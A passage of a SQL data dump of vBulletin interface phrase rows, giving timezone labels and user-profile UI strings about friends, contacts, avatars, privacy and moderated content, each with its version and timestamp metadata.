(38296, -1, 'timezone_gmt_plus_0500', 'timezone', '(GMT +5:00) Ekaterinburg, Islamabad, Karachi, Tashkent', 'vbulletin', '', 0, ''),
(38297, -1, 'timezone_gmt_plus_0530', 'timezone', '(GMT +5:30) Mumbai, Kolkata, Chennai, New Delhi', 'vbulletin', 'vBulletin Solutions', 1213266062, '3.8.0 Alpha 1'),
(38298, -1, 'timezone_gmt_plus_0545', 'timezone', '(GMT +5:45) Kathmandu', 'vbulletin', 'vBulletin Solutions', 1201668910, '3.7.0 Beta 5'),
(38299, -1, 'timezone_gmt_plus_0600', 'timezone', '(GMT +6:00) Almaty, Dhaka, Colombo', 'vbulletin', '', 0, ''),
(38300, -1, 'timezone_gmt_plus_0630', 'timezone', '(GMT +6:30) Yangon, Cocos Islands', 'vbulletin', 'vBulletin Solutions', 1201669000, '3.7.0 Beta 5'),
(38301, -1, 'timezone_gmt_plus_0700', 'timezone', '(GMT +7:00) Bangkok, Hanoi, Jakarta', 'vbulletin', '', 0, ''),
(38302, -1, 'timezone_gmt_plus_0800', 'timezone', '(GMT +8:00) Beijing, Perth, Singapore, Hong Kong', 'vbulletin', '', 0, ''),
(38303, -1, 'timezone_gmt_plus_0900', 'timezone', '(GMT +9:00) Tokyo, Seoul, Osaka, Sapporo, Yakutsk', 'vbulletin', '', 0, ''),
(38304, -1, 'timezone_gmt_plus_0930', 'timezone', '(GMT +9:30) Adelaide, Darwin', 'vbulletin', '', 0, ''),
(38305, -1, 'timezone_gmt_plus_1000', 'timezone', '(GMT +10:00) Eastern Australia, Guam, Vladivostok', 'vbulletin', '', 0, ''),
(38306, -1, 'timezone_gmt_plus_1100', 'timezone', '(GMT +11:00) Magadan, Solomon Islands, New Caledonia', 'vbulletin', '', 0, ''),
(38307, -1, 'timezone_gmt_plus_1200', 'timezone', '(GMT +12:00) Auckland, Wellington, Fiji, Kamchatka', 'vbulletin', '', 0, ''),
(38308, -1, 'about_me', 'user', 'About Me', 'vbulletin', 'vBulletin Solutions', 1194351000, '3.7.0 Beta 1'),
(38309, -1, 'about_x', 'user', 'About {1}', 'vbulletin', 'vBulletin Solutions', 1194275571, '3.7.0 Beta 1'),
(38310, -1, 'accept_pm_only_from_contacts', 'user', 'You may limit the receipt of private messages to just moderators and your contacts . Other members who attempt to send messages to you will be told that you have disabled private messaging.', 'vbulletin', 'vBulletin Solutions', 1196775638, '3.7.0 Beta 1'),
(38311, -1, 'accept_selected_friend_requests', 'user', 'Accept selected friend requests', 'vbulletin', 'vBulletin Solutions', 1196430236, '3.7.0 Beta 1'),
(38312, -1, 'activate_your_account', 'user', 'Activate Your Account', 'vbulletin', '', 0, ''),
(38313, -1, 'activation_code', 'user', 'Activation Code', 'vbulletin', '', 0, ''),
(38314, -1, 'add_album', 'user', 'Add Album', 'vbulletin', 'vBulletin Solutions', 1194359889, '3.7.0 Beta 1'),
(38315, -1, 'add_contact', 'user', 'Add Contact', 'vbulletin', 'vBulletin Solutions', 1196779904, '3.7.0 Beta 1'),
(38316, -1, 'add_friend', 'user', 'Add Friend', 'vbulletin', 'vBulletin Solutions', 1196779929, '3.7.0 Beta 1'),
(38317, -1, 'add_member_to_your_list', 'user', 'Add a Member to Your List...', 'vbulletin', 'vBulletin Solutions', 1197891500, '3.7.0 Beta 2'),
(38318, -1, 'add_new_user_to_list', 'user', 'Add New User to List', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38319, -1, 'add_to_contacts', 'user', 'Add to Contacts', 'vbulletin', 'vBulletin Solutions', 1196421504, '3.7.0 Beta 1'),
(38320, -1, 'add_to_friends_list', 'user', 'Add to Friends List', 'vbulletin', 'vBulletin Solutions', 1195580788, '3.7.0 Beta 1'),
(38321, -1, 'add_to_ignore_list', 'user', 'Add to Ignore List', 'vbulletin', 'vBulletin Solutions', 1195580797, '3.7.0 Beta 1'),
(38322, -1, 'add_x_to_contacts_confirm', 'user', 'Are you sure you want to add {1} to your contacts?', 'vbulletin', 'vBulletin Solutions', 1196423591, '3.7.0 Beta 1'),
(38323, -1, 'add_x_to_ignore_list', 'user', 'Add {1} to Your Ignore List', 'vbulletin', '', 0, ''),
(38324, -1, 'add_x_to_ignorelist_confirm', 'user', 'Are you sure you want to add {1} to your ignore list?', 'vbulletin', 'vBulletin Solutions', 1195754041, '3.7.0 Beta 1'),
(38325, -1, 'additional_information', 'user', 'Additional Information', 'vbulletin', '', 0, ''),
(38326, -1, 'additional_users', 'user', 'Additional Users', 'vbulletin', '', 0, ''),
(38327, -1, 'administrators_may_send_email', 'user', 'From time to time, the administrators may want to send you email notices. \r\n \r\n If you do not want to receive these notices, disable this option.', 'vbulletin', '', 0, ''),
(38328, -1, 'aim_screen_name', 'user', 'AIM Screen Name', 'vbulletin', '', 0, ''),
(38329, -1, 'album_pictures', 'user', 'Album Pictures', 'vbulletin', 'vBulletin Solutions', 1203708662, '3.7.0 Beta 6'),
(38330, -1, 'albums', 'user', 'Albums', 'vbulletin', 'vBulletin Solutions', 1194350720, '3.7.0 Beta 1'),
(38331, -1, 'albums_created_by_x', 'user', 'Albums Created by {1}', 'vbulletin', 'vBulletin Solutions', 1194366013, '3.7.0 Beta 1'),
(38332, -1, 'all', 'user', 'All', 'vbulletin', '', 0, ''),
(38333, -1, 'allow_daylight_savings_time', 'user', 'In addition, you may set the appropriate option to allow for daylight savings time in your part of the world.', 'vbulletin', '', 0, ''),
(38334, -1, 'allow_members_send_you_email', 'user', 'You can allow other members to send you email messages.', 'vbulletin', '', 0, ''),
(38335, -1, 'allow_vcard_download', 'user', 'Allow vCard Download', 'vbulletin', '', 0, ''),
(38336, -1, 'also_remove_x_from_contacts', 'user', 'Also remove {1} from your contacts', 'vbulletin', 'vBulletin Solutions', 1196421974, '3.7.0 Beta 1'),
(38337, -1, 'also_send_friend_request_to_x', 'user', 'Also send a friend request to {1}', 'vbulletin', 'vBulletin Solutions', 1195754110, '3.7.0 Beta 1'),
(38338, -1, 'anyone_free_to_join_group', 'user', 'Anyone is free to join this usergroup', 'vbulletin', '', 0, ''),
(38339, -1, 'approve_messages', 'user', 'Approve Messages', 'vbulletin', 'vBulletin Solutions', 1191537381, '3.7.0 Beta 1'),
(38340, -1, 'attachments_posted_by_x', 'user', 'Attachments Posted by {1}', 'vbulletin', '', 0, ''),
(38341, -1, 'automatically_detect_dst_settings', 'user', 'Automatically detect DST settings', 'vbulletin', '', 0, ''),
(38342, -1, 'avatar', 'user', 'Avatar', 'vbulletin', '', 0, ''),
(38343, -1, 'avatar_category', 'user', 'Avatar Category', 'vbulletin', '', 0, ''),
(38344, -1, 'avatars_small_graphics_short', 'user', 'Avatars are small graphics that are displayed under your username whenever you post.', 'vbulletin', '', 0, ''),
(38345, -1, 'background_images_album_x', 'user', 'Background images must come from your albums . Enter the URL to a picture in one of your public or profile albums.', 'vbulletin', 'vBulletin Solutions', 1198280039, '3.7.0 Beta 4'),
(38346, -1, 'basic_editor_simple_text_box', 'user', 'Basic Editor - A simple text box', 'vbulletin', '', 0, ''),
(38347, -1, 'birth_date', 'user', 'Date of Birth', 'vbulletin', '', 0, ''),
(38348, -1, 'birthday', 'user', 'Birthday', 'vbulletin', '', 0, ''),
(38349, -1, 'block_display_options', 'user', 'If you would like to restrict the display of some of the blocks on your profile page, select a minimum relationship that other users must meet to see the blocks. \r\n \r\nNote: Guests and users on your Ignore List will only be able to view the blocks on your page where you have selected \'Everyone\'.', 'vbulletin', 'vBulletin Solutions', 1232540886, '3.8.1'),
(38350, -1, 'board_can_be_shown_any_language', 'user', 'Although the forum cannot translate the actual contents of messages, all the controls and help text can be shown to you in any of the following languages.', 'vbulletin', '', 0, ''),
(38351, -1, 'board_language', 'user', 'Forum Language', 'vbulletin', '', 0, ''),
(38352, -1, 'board_skin', 'user', 'Forum Skin', 'vbulletin', '', 0, ''),
(38353, -1, 'break_friendship', 'user', 'Break Friendship', 'vbulletin', 'vBulletin Solutions', 1195172414, '3.7.0 Beta 1'),
(38354, -1, 'browsing_when_receive_pm_popup', 'user', 'If you are browsing the forums when you receive a new private message, the system can pop-up a notification box informing you of the new message.', 'vbulletin', '', 0, ''),
(38355, -1, 'can_automatically_subscribe', 'user', 'When you post a new thread, or reply to a topic, you can choose to automatically add that thread to your list of subscribed threads , with the option to receive email notification of new replies to that thread.', 'vbulletin', '', 0, ''),
(38356, -1, 'can_email_when_sends_you_pm', 'user', 'The forum can send a message to your email address to inform you when someone sends you a private message.', 'vbulletin', '', 0, ''),
(38357, -1, 'cannot_leave_primary_group', 'user', 'Cannot leave primary group', 'vbulletin', '', 0, ''),
(38358, -1, 'choose_thread_display_mode', 'user', 'Here you can choose the display mode for threads. For a full explanation of the modes, please view this help page .', 'vbulletin', '', 0, ''),
(38359, -1, 'clear', 'user', 'Clear', 'vbulletin', '', 0, ''),
(38360, -1, 'clear_all', 'user', 'Clear All', 'vbulletin', 'vBulletin Solutions', 1193931913, '3.7.0 Beta 1'),
(38361, -1, 'click_button_below_edit_email', 'user', 'Please click the button below to edit your email address and password. Any changes you\'ve made on this page will not be saved.', 'vbulletin', 'vBulletin Solutions', 1232712277, '3.8.1'),
(38362, -1, 'click_here_to_email_x', 'user', 'Click Here to Email {1}', 'vbulletin', '', 0, ''),
(38363, -1, 'click_save_to_add_x_to_list', 'user', 'Click the \'Save List\' button to add {1} to this list, or click your browser\'s \'Back\' button to cancel.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38364, -1, 'close', 'user', 'Close', 'vbulletin', 'vBulletin Solutions', 1193401056, '3.7.0 Beta 1'),
(38365, -1, 'comment', 'user', 'Comment', 'vbulletin', '', 0, ''),
(38366, -1, 'confirm_friendship_request', 'user', 'Confirm Friendship Request', 'vbulletin', 'vBulletin Solutions', 1200443037, '3.7.0 Beta 4'),
(38367, -1, 'confirm_friendship_request_from_x', 'user', 'Are you sure you want to confirm {1}\'s request to be friends?', 'vbulletin', 'vBulletin Solutions', 1200494408, '3.7.0 Beta 4'),
(38368, -1, 'confirm_new_email_address', 'user', 'Confirm New Email Address', 'vbulletin', '', 0, ''),
(38369, -1, 'confirm_new_password', 'user', 'Confirm New Password', 'vbulletin', '', 0, ''),
(38370, -1, 'confirm_user_list_modification', 'user', 'Confirm User List Modification', 'vbulletin', 'vBulletin Solutions', 1195754173, '3.7.0 Beta 1'),
(38371, -1, 'contact_admin_to_modify_birthday', 'user', 'Please contact the Administrator if your date of birth has changed.', 'vbulletin', '', 0, ''),
(38372, -1, 'contact_info', 'user', 'Contact Info', 'vbulletin', '', 0, ''),
(38373, -1, 'contacts_instructions', 'user', 'To remove a user from your contacts, un-check the box associated with their avatar and click the \'Save Changes\' button. \r\n \r\nTo add a user to the list, enter their name into the empty text box and click \'Add Contact\' to add them to your list.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(38374, -1, 'control_panel', 'user', 'Control Panel', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38375, -1, 'conversation_between_x_and_y', 'user', 'Conversation Between {1} and {2}', 'vbulletin', 'vBulletin Solutions', 1202925662, '3.7.0 Beta 5'),
(38376, -1, 'coppa_information', 'user', 'COPPA Information', 'vbulletin', '', 0, ''),
(38377, -1, 'current_activity', 'user', 'Current Activity', 'vbulletin', 'vBulletin Solutions', 1194347751, '3.7.0 Beta 1'),
(38378, -1, 'current_password_expired', 'user', 'Your current password has expired. Please change it now.', 'vbulletin', '', 0, ''),
(38379, -1, 'current_reputation_level_is_displayed', 'user', 'Your current reputation level is displayed to other users whenever you post a message. If you would like to hide your reputation, disable this option. \r\n \r\n You currently have {1} reputation points.', 'vbulletin', '', 0, ''),
(38380, -1, 'current_sig_image', 'user', 'Current signature image', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38381, -1, 'currently_using_x_to_store_y_attachments', 'user', 'You are currently using {1} to store {2} uploaded attachments.', 'vbulletin', '', 0, ''),
(38382, -1, 'custom_avatar', 'user', 'Custom Avatar', 'vbulletin', '', 0, ''),
(38383, -1, 'custom_profile_picture', 'user', 'Custom Profile Picture', 'vbulletin', '', 0, ''),
(38384, -1, 'custom_user_title', 'user', 'Custom User Title', 'vbulletin', '', 0, ''),
(38385, -1, 'customize_profile', 'user', 'Customize Profile', 'vbulletin', 'vBulletin Solutions', 1191919870, '3.7.0 Beta 1'),
(38386, -1, 'date_time_options', 'user', 'Date & Time Options', 'vbulletin', '', 0, ''),
(38387, -1, 'default_thread_age_cut_off', 'user', 'Default Thread Age Cut Off', 'vbulletin', '', 0, ''),
(38388, -1, 'default_thread_subscription_mode', 'user', 'Default Thread Subscription Mode', 'vbulletin', '', 0, ''),
(38389, -1, 'delete_current_image', 'user', 'Delete current image?', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38390, -1, 'delete_messages', 'user', 'Delete Messages', 'vbulletin', 'vBulletin Solutions', 1191537362, '3.7.0 Beta 1'),
(38391, -1, 'deleted_discussions', 'user', 'Deleted Discussions', 'vbulletin', 'vBulletin Solutions', 1213100757, '3.7.1'),
(38392, -1, 'deleted_items', 'user', 'Deleted Items', 'vbulletin', 'vBulletin Solutions', 1200606980, '3.7.0 Beta 4'),
(38393, -1, 'deleted_messages', 'user', 'Deleted Messages', 'vbulletin', 'vBulletin Solutions', 1191964826, '3.7.0 Beta 1'),
(38394, -1, 'deleted_picture_comments', 'user', 'Deleted Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200698783, '3.7.0 Beta 4'),
(38395, -1, 'deleted_posts', 'user', 'Deleted Posts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38396, -1, 'deleted_social_group_discussions', 'user', 'Deleted Social Group Discussions', 'vbulletin', 'vBulletin Solutions', 1213102842, '3.7.1'),
(38397, -1, 'deleted_social_group_messages', 'user', 'Deleted Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1200616252, '3.7.0 Beta 4'),
(38398, -1, 'deleted_threads', 'user', 'Deleted Threads', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38399, -1, 'deleted_visitor_messages', 'user', 'Deleted Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1200616263, '3.7.0 Beta 4'),
(38400, -1, 'deleted_within', 'user', 'Deleted within', 'vbulletin', 'vBulletin Solutions', 1142533819, '3.6.0 Beta 1'),
(38401, -1, 'deselect_all', 'user', 'Deselect All', 'vbulletin', 'vBulletin Solutions', 1194544114, '3.7.0 Beta 1'),
(38402, -1, 'deselect_all_messages', 'user', 'Deselect All Messages', 'vbulletin', 'vBulletin Solutions', 1191537924, '3.7.0 Beta 1'),
(38403, -1, 'details', 'user', 'Details', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38404, -1, 'discussion', 'user', 'Discussion', 'vbulletin', 'vBulletin Solutions', 1213884345, '3.7.1'),
(38405, -1, 'discussion_x', 'user', 'Discussion: {2} ', 'vbulletin', 'vBulletin Solutions', 1214227776, '3.7.1'),
(38406, -1, 'discussions', 'user', 'Discussions', 'vbulletin', 'vBulletin Solutions', 1213885351, '3.7.1'),
(38407, -1, 'display_age', 'user', 'Display Only Age', 'vbulletin', 'vBulletin Solutions', 1166137208, '3.6.5'),
(38408, -1, 'display_age_and_dob', 'user', 'Display Age and Full Date of Birth', 'vbulletin', 'vBulletin Solutions', 1166137242, '3.6.5'),
(38409, -1, 'display_day_and_month', 'user', 'Display Only Day and Month of Birth', 'vbulletin', 'vBulletin Solutions', 1166137504, '3.6.5'),
(38410, -1, 'display_permissions_form', 'user', 'Display Permissions Form', 'vbulletin', '', 0, ''),
(38411, -1, 'do_not_subscribe', 'user', 'Do not subscribe', 'vbulletin', '', 0, ''),
(38412, -1, 'do_not_use_an_avatar', 'user', 'Do not use an avatar', 'vbulletin', '', 0, ''),
(38413, -1, 'download_vcard', 'user', 'Download vCard', 'vbulletin', '', 0, ''),
(38414, -1, 'dst_correction_option', 'user', 'DST Correction Option', 'vbulletin', '', 0, ''),
(38415, -1, 'dst_corrections_always_off', 'user', 'DST corrections always off', 'vbulletin', '', 0, ''),
(38416, -1, 'dst_corrections_always_on', 'user', 'DST corrections always on', 'vbulletin', '', 0, ''),
(38417, -1, 'edit_email_address', 'user', 'Edit Email Address', 'vbulletin', '', 0, ''),
(38418, -1, 'edit_email_and_password', 'user', 'Edit Email & Password', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38419, -1, 'edit_ignore_list', 'user', 'Edit Ignore List', 'vbulletin', 'vBulletin Solutions', 1195734383, '3.7.0 Beta 1'),
(38420, -1, 'edit_password', 'user', 'Edit Password', 'vbulletin', '', 0, ''),
(38421, -1, 'edit_user_profile', 'user', 'Edit User Profile', 'vbulletin', 'vBulletin Solutions', 1197482482, '3.7.0 Beta 1'),
(38422, -1, 'edit_value_js', 'user', 'Edit Value', 'vbulletin', 'vBulletin Solutions', 1199403107, '3.7.0 Beta 4'),
(38423, -1, 'edit_visitor_message', 'user', 'Edit Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197370565, '3.7.0 Beta 1'),
(38424, -1, 'edit_your_about_me', 'user', 'Edit your \"About Me\"', 'vbulletin', 'vBulletin Solutions', 1204841595, '3.7.0 Beta 6'),
(38425, -1, 'edit_your_friends_list', 'user', 'Edit Your Friends List', 'vbulletin', 'vBulletin Solutions', 1197902685, '3.7.0 Beta 2'),
(38426, -1, 'email_activation_codes', 'user', 'Email Activation Codes', 'vbulletin', '', 0, ''),
(38427, -1, 'email_and_password', 'user', 'Email & Password', 'vbulletin', '', 0, ''),
(38428, -1, 'empty_current_folder', 'user', 'Empty Current Folder', 'vbulletin', 'vBulletin Solutions', 1220364727, '3.8.0 Alpha 1'),
(38429, -1, 'enable_private_messaging', 'user', 'Enable Private Messaging', 'vbulletin', '', 0, ''),
(38430, -1, 'enable_visitor_messaging', 'user', 'Enable Visitor Messaging', 'vbulletin', 'vBulletin Solutions', 1203119616, '3.7.0 Beta 6'),
(38431, -1, 'enhanced_interface_wysiwyg', 'user', 'Enhanced Interface - Full WYSIWYG Editing', 'vbulletin', '', 0, ''),
(38432, -1, 'enter_password_to_continue', 'user', 'Enter your present password to continue', 'vbulletin', '', 0, ''),
(38433, -1, 'enter_url_to_image', 'user', 'Option 1 - Enter the URL to the Image on Another Website', 'vbulletin', 'vBulletin Solutions', 1158604438, '3.6.2'),
(38434, -1, 'entering_message_three_interface', 'user', 'When posting messages to the forums or other members, there are three interface types available to you. The simplest of these is a simple text box, while the last is a fully-fledged WYSIWYG editor, which allows you to format your text as you want it and see the results immediately. \r\n \r\n Depending upon the capabilities of your web browser, you may not be able to use all of these options. If you experience problems when posting messages, try switching to a different interface type.', 'vbulletin', '', 0, ''),
(38435, -1, 'everyone', 'user', 'Everyone', 'vbulletin', 'vBulletin Solutions', 1218459145, '3.8.0 Alpha 1'),
(38436, -1, 'expired', 'user', 'Expired', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38437, -1, 'expires', 'user', 'Expires', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38438, -1, 'features_private_messaging_system', 'user', 'This forum features a private messaging system , which allows members to send messages to one another privately. \r\n \r\nIf you do not want to send or receive private messages, you may disable the private messaging system.', 'vbulletin', '', 0, ''),
(38439, -1, 'features_visitor_messaging_system', 'user', 'This forum features a visitor messaging system that allows members to send messages to one another publicly. If you do not want to receive visitor messages, you may disable the visitor messaging system.', 'vbulletin', 'vBulletin Solutions', 1203507245, '3.7.0 Beta 6'),
(38440, -1, 'find_all_threads_started_by_x', 'user', 'Find all threads started by {1}', 'vbulletin', '', 0, ''),
(38441, -1, 'find_people_on_your_list', 'user', 'Find People on Your List', 'vbulletin', 'vBulletin Solutions', 1213105414, '3.8.0 Alpha 1'),
(38442, -1, 'find_posts', 'user', 'Find Posts', 'vbulletin', '', 0, ''),
(38443, -1, 'following_groups_available_to_join', 'user', 'The following groups are available for you to join', 'vbulletin', '', 0, ''),
(38444, -1, 'forum_info', 'user', 'Forum Info', 'vbulletin', '', 0, ''),
(38445, -1, 'friend_request_list', 'user', 'Friend Request List', 'vbulletin', 'vBulletin Solutions', 1193688297, '3.7.0 Beta 1'),
(38446, -1, 'friends', 'user', 'Friends', 'vbulletin', 'vBulletin Solutions', 1193688203, '3.7.0 Beta 1'),
(38447, -1, 'friends_instructions', 'user', 'To remove a user from your contacts, un-check the box associated with their avatar and click the \'Save Changes\' button. \r\n \r\nTo add a user to the list, enter their name into the empty text box and click either \'Contact\' to add them to your list, or \'Friend\' to also send a friendship request.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(38448, -1, 'friendship_requested', 'user', 'Friendship Requested', 'vbulletin', 'vBulletin Solutions', 1195754186, '3.7.0 Beta 1'),
(38449, -1, 'from_this_page', 'user', 'From this Page ...', 'vbulletin', 'vBulletin Solutions', 1194544051, '3.7.0 Beta 1'),
(38450, -1, 'general_information', 'user', 'General Information', 'vbulletin', 'vBulletin Solutions', 1194366567, '3.7.0 Beta 1'),
(38451, -1, 'give_infraction', 'user', 'Give Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38452, -1, 'group_content', 'user', 'Group Content', 'vbulletin', 'vBulletin Solutions', 1214928999, '3.7.1'),
(38453, -1, 'group_created', 'user', 'Created', 'vbulletin', 'vBulletin Solutions', 1213884414, '3.7.1'),
(38454, -1, 'group_discussions', 'user', 'Group Discussions', 'vbulletin', 'vBulletin Solutions', 1214229134, '3.7.1'),
(38455, -1, 'group_leaders', 'user', 'Group leaders', 'vbulletin', '', 0, ''),
(38456, -1, 'group_members', 'user', 'Members', 'vbulletin', 'vBulletin Solutions', 1213885379, '3.7.1'),
(38457, -1, 'group_memberships', 'user', 'Group Memberships', 'vbulletin', 'vBulletin Solutions', 1194350958, '3.7.0 Beta 1'),
(38458, -1, 'group_messages', 'user', 'Group Messages', 'vbulletin', 'vBulletin Solutions', 1214229116, '3.7.1'),
(38459, -1, 'group_name', 'user', 'Group Name', 'vbulletin', 'vBulletin Solutions', 1213885402, '3.7.1'),
(38460, -1, 'group_x', 'user', 'Group: {2} ', 'vbulletin', 'vBulletin Solutions', 1214924033, '3.7.1'),
(38461, -1, 'have_custom_avatar_want_as_is', 'user', 'If you have a custom avatar and want to keep it as it is, leave the fields below as they are.', 'vbulletin', '', 0, ''),
(38462, -1, 'hide_age_and_dob', 'user', 'Hide Age and Date of Birth', 'vbulletin', '', 0, ''),
(38463, -1, 'hide_user_customizations', 'user', 'Hide User Customizations', 'vbulletin', 'vBulletin Solutions', 1196091070, '3.7.0 Beta 1'),
(38464, -1, 'home_page', 'user', 'Home Page', 'vbulletin', '', 0, ''),
(38465, -1, 'home_page_url', 'user', 'Home Page URL', 'vbulletin', '', 0, ''),
(38466, -1, 'icq_number', 'user', 'ICQ Number', 'vbulletin', '', 0, ''),
(38467, -1, 'identify_as_member_of_group', 'user', 'Identify me as a member of this group', 'vbulletin', '', 0, ''),
(38468, -1, 'if_under_13_provide_parent', 'user', 'If you are aged under 13, you must provide the email address of your parent or guardian.', 'vbulletin', '', 0, ''),
(38469, -1, 'ignore_list', 'user', 'Ignore List', 'vbulletin', '', 0, ''),
(38470, -1, 'ignored_users', 'user', 'Ignored Users', 'vbulletin', 'vBulletin Solutions', 1215094623, '3.8.0 Alpha 1'),
(38471, -1, 'ignorelist_instructions', 'user', 'To remove a user from your ignore list, un-check the box associated with their name and click the \'Save Changes\' button. \r\n \r\nTo add a user to the list, enter their name into the empty text box and click \'Okay\'.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(38472, -1, 'including_attached_and_img_code', 'user', 'including attached images and images in [IMG] code', 'vbulletin', '', 0, ''),
(38473, -1, 'incoming_friend_requests_description', 'user', 'The following members want to be friends with you:', 'vbulletin', 'vBulletin Solutions', 1195754253, '3.7.0 Beta 1'),
(38474, -1, 'insert_signature_picture', 'user', 'Insert Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38475, -1, 'instant', 'user', 'Instant', 'vbulletin', '', 0, ''),
(38476, -1, 'invert_selection', 'user', 'Invert Selection', 'vbulletin', 'vBulletin Solutions', 1194544142, '3.7.0 Beta 1'),
(38477, -1, 'invisible_mode', 'user', 'Invisible Mode', 'vbulletin', '', 0, ''),
(38478, -1, 'invisible_mode_allows', 'user', 'Invisible mode allows you to browse the forums without appearing in the \'Currently Active Users\' lists.', 'vbulletin', '', 0, ''),
(38479, -1, 'ip', 'user', 'IP', 'vbulletin', 'vBulletin Solutions', 1194535436, '3.7.0 Beta 1'),
(38480, -1, 'join_group', 'user', 'Join Group', 'vbulletin', '', 0, ''),
(38481, -1, 'join_social_groups', 'user', 'Join Social Groups', 'vbulletin', 'vBulletin Solutions', 1195643522, '3.7.0 Beta 1'),
(38482, -1, 'joining_conditions', 'user', 'Joining Conditions', 'vbulletin', '', 0, ''),
(38483, -1, 'last_note', 'user', 'Last Note', 'vbulletin', '', 0, ''),
(38484, -1, 'last_visit', 'user', 'Last Visit', 'vbulletin', '', 0, ''),
(38485, -1, 'last_x_visitors', 'user', 'The last {1} visitor(s) to this page were:\r\n', 'vbulletin', 'vBulletin Solutions', 1205923196, '3.7.0 Release Candidate 1'),
(38486, -1, 'latest_infractions_received', 'user', 'Latest Infractions Received', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38487, -1, 'latest_reputation_received', 'user', 'Latest Reputation Received', 'vbulletin', '', 0, ''),
(38488, -1, 'leader_of_this_group', 'user', 'You are a leader of this group', 'vbulletin', '', 0, ''),
(38489, -1, 'leave_group', 'user', 'Leave Group', 'vbulletin', '', 0, ''),
(38490, -1, 'let_other_visitors_know_url', 'user', 'If you would like to let other visitors to this site know the URL of your own web site, enter it here.', 'vbulletin', '', 0, ''),
(38491, -1, 'limit_vm_to_contacts_only', 'user', 'Limit usage of Visitor Messages to Contacts and Moderators', 'vbulletin', 'vBulletin Solutions', 1203371447, '3.7.0 Beta 6'),
(38492, -1, 'linear', 'user', 'Linear', 'vbulletin', '', 0, ''),
(38493, -1, 'list_members', 'user', 'List Members', 'vbulletin', '', 0, ''),
(38494, -1, 'login_privacy', 'user', 'Login & Privacy', 'vbulletin', '', 0, ''),
(38495, -1, 'make_changes_parent_notified', 'user', 'When you make changes to this profile, your Parent / Guardian will be notified by email. \r\n \r\n If you are over the age of 13, you should not be seeing this message. Please contact the administrator with your username, and your account will be changed.', 'vbulletin', '', 0, ''),
(38496, -1, 'manage_your_friend_requests', 'user', 'Manage your Friend Requests', 'vbulletin', 'vBulletin Solutions', 1196173924, '3.7.0 Beta 1'),
(38497, -1, 'may_allow_users_tdownload_vcard', 'user', 'You may choose to allow other users to download a vCard containing your email address and username. \r\n \r\n If you want to keep your email address private, do not allow vCard downloads.', 'vbulletin', '', 0, ''),
(38498, -1, 'may_be_identified_member_groups', 'user', 'You may choose to be identified as a member of the following groups', 'vbulletin', '', 0, ''),
(38499, -1, 'may_enter_identity_for_im', 'user', 'You may enter your registered identity for the instant messaging networks if you would like other visitors to be able to contact you using that medium.', 'vbulletin', '', 0, ''),
(38500, -1, 'may_select_predefined_as_avatar', 'user', 'You may select one of the following pre-defined images to use as your avatar:', 'vbulletin', '', 0, ''),
(38501, -1, 'may_upload_custom_image_controls', 'user', 'You may upload a new custom image using the controls below. ', 'vbulletin', 'vBulletin Solutions', 1158606259, '3.6.2'),
(38502, -1, 'member_of_following_groups', 'user', 'You are a member of the following groups', 'vbulletin', '', 0, ''),
(38503, -1, 'members_of_usergroup', 'user', 'Members of Usergroup', 'vbulletin', '', 0, ''),
(38504, -1, 'message_editor_interface', 'user', 'Message Editor Interface', 'vbulletin', '', 0, ''),
(38505, -1, 'messaging_notification', 'user', 'Messaging & Notification', 'vbulletin', '', 0, ''),
(38506, -1, 'mini_statistics', 'user', 'Mini Statistics', 'vbulletin', 'vBulletin Solutions', 1194350604, '3.7.0 Beta 1'),
(38507, -1, 'moderated_discussion_prefix', 'user', 'Moderated:', 'vbulletin', 'vBulletin Solutions', 1214386210, '3.7.1'),
(38508, -1, 'moderated_discussions', 'user', 'Moderated Discussions', 'vbulletin', 'vBulletin Solutions', 1213100776, '3.7.1'),
(38509, -1, 'moderated_items', 'user', 'Moderated Items', 'vbulletin', 'vBulletin Solutions', 1200606971, '3.7.0 Beta 4'),
(38510, -1, 'moderated_messages', 'user', 'Moderated Messages', 'vbulletin', 'vBulletin Solutions', 1191964803, '3.7.0 Beta 1'),
(38511, -1, 'moderated_picture_comments', 'user', 'Moderated Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200698776, '3.7.0 Beta 4'),
(38512, -1, 'moderated_pictures', 'user', 'Moderated Pictures', 'vbulletin', 'vBulletin Solutions', 1203712830, '3.7.0 Beta 6'),
(38513, -1, 'moderated_posts', 'user', 'Moderated Posts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38514, -1, 'moderated_social_group_discussions', 'user', 'Moderated Social Group Discussions', 'vbulletin', 'vBulletin Solutions', 1213102817, '3.7.1'),
(38515, -1, 'moderated_social_group_messages', 'user', 'Moderated Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1200616243, '3.7.0 Beta 4'),
(38516, -1, 'moderated_threads', 'user', 'Moderated Threads', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(38517, -1, 'moderated_visitor_message', 'user', 'Moderated Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197370577, '3.7.0 Beta 1'),
